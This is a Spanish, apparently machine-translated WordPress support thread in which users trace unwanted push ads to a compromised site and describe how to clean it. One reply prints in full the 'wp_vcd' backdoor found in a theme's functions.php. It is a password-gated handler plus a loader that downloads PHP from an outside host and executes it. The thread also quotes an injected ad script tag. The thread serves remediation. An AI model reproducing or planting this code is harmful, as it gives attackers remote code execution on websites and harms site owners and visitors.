Un usuario pregunt贸 馃憞
Elimine la siguiente cadena de referencias si es posible:
https://go.mobisla.com/notice.php?p=1399567&interactive=1&pushup=1
https://go.pushnative.com/notice.php?p=1399567&interactive=1&pushup=1
Elimine la siguiente cadena de referencias si es posible:
Por qu茅 estos plugins se agregan activamente al sitio y vienen usando una herramienta pingdome, los anuncios en los que se puede hacer clic se muestran en la pantalla de escritorio y m贸vil https://tools.pingdom.com/#!/vq0n1/https://mansooralikhan.com/
(@optimizingmatters)
Hace 3 a帽os, 3 meses
bueno, con AO inactivo (agregando ?ao_noptimize=1 a la URL) Veo esto en su HTML;
<
<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1399567&interactive=1&pushup=1"></script>
no tengo idea de d贸nde (qu茅) de aqu铆 estoy afriad @angeleyesupport.
honesto
(@ericrickie)
Hace 3 a帽os, 3 meses
Yo tuve el mismo problema. As铆 es como lo resolv铆.
1. Navegue hasta wp foler incluido en su directorio de wordpress y elimine estos archivos: wp_vcd.php, class.wp.php.
2.En la misma carpeta, busque post.php y elimine cualquier c贸digo en la parte superior que precede:
<?php
/**
* Core Post API
*
* @package WordPress
* @subpackage Post
*/
//
// Post Type Registration
//
/**
* Creates the initial post types when 'init' action is fired.
*
* See {@see 'init'}.
*
* @since 2.9.0
*/
function create_initial_post_types() {
register_post_type( 'post', array(
'labels' => array.....3. Navegue hasta la ubicaci贸n de la carpeta de su tema y busque el archivo function.php. El siguiente c贸digo debe estar en la parte superior.
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'f021e824fb05a9e4678d312683a585c0'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/$tmpcontent = @file_get_contents("http://(.*)/code10.php/i',$file,$matcholddomain))
{
$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die("");
}
if ( ! function_exists( 'theme_temp_setup' ) ) {
$path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
if ( ! is_404() && stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
if($tmpcontent = @file_get_contents("http://www.dolsh.com/code10.php?i=".$path))
{
function theme_temp_setup($phpCode) {
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?phpn" . $phpCode);
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}
extract(theme_temp_setup($tmpcontent));
}
}
}
?>(@optimizingmatters)
Hace 3 a帽os, 3 meses
si esta es la soluci贸n, entonces significa que fuiste hackeado @ericrickie (cfr. esta publicaci贸n t茅cnica del blog), en cuyo caso me gustar铆a reinstalar el asesoramiento desde cero.
honesto
驴Solucion贸 tu problema??
0 / 0